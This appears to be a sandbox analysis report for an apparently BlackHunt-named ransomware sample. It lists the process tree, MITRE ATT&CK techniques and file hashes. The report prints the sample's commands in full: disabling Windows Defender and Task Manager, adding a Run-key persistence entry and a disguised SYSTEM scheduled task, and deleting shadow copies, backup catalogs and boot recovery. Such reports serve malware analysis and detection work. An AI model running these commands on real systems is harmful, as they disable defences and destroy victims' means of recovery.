C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe" /F2⤵PID:972
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe" /F3⤵
- Creates scheduled task(s)
PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1268
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3408
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4844
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4824
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:468
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1196
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1988
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:220
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1928
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2544
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3732
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59f840c3a2913f7a41fa5740295fd9b28
SHA184ae6a5abf191bcc412b019fc50e0ec72cd7e5ec
SHA256595ebc8c3ec30ea150bd735795c21dd93de454dfe9e72b928decc0b83df405eb
SHA5125cd3bc3bd4d4a0fa198ae880f5cd34d709d836a9080376738dc35386e348de879a7140f97d5b6671fd8ed1ff7a7f5a5dd3a873e82d337c2b1f2db18dafd23ab2
-
Filesize
12KB
MD59e8eb1589e146dcb8977f4821f9ad346
SHA15c2ff67af4ae2ad57ca57db82f79a757bf3ab43a
SHA256b1a857110d432d0895ef241d18b4b7fb36510bd4a823ab34945e5fd2106ed9f9
SHA51277b18de02a56aa5082f5960b191dfadc4d1d2579b2b0a502babcfd1608ad3053ae22bd5d7a4238ad76faf26f19a5e4e436f89518e29afa25311b22c276523807
-
Filesize
684B
MD56ef05b85b8e84a04d7451d6f5c8465fd
SHA195bb84355b295597ac5ddf4447309f1cd58b5208
SHA2566ef123e7cf933526a4bb42e60b8c5c5596d9e0ede12b9c67c5157f4ccd893c1f
SHA51290a9a27dd73bbd014a78fff6f79ddf563e4311597e7d84bb06fe5be38f8af8dde2cb946530b0fad10f32111f1c8321532aea719b8aca996948af0c7f1c4e9cf3